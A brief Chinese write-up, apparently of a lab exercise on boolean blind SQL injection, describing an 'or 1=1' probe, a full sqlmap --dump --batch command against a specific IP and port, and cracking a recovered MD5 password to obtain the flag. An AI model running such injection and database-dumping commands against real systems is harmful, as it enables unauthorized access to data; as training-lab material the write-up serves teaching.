首先查看源代码,能找到new_list.php?id=1这个url,进入里面,使用了or 1=1,发现无回显,使用SQLmap进行**,具体命令为
sqlmap.py-u “http://219.153.49.228:46048/new_list.php?id=1” --dump --batch
SQL注入漏洞测试(布尔盲注)
用户名是mozhe,密码经过了MD5加密,我们在线解密
SQL注入漏洞测试(布尔盲注)
输入用户名密码,获得key。

相关文章: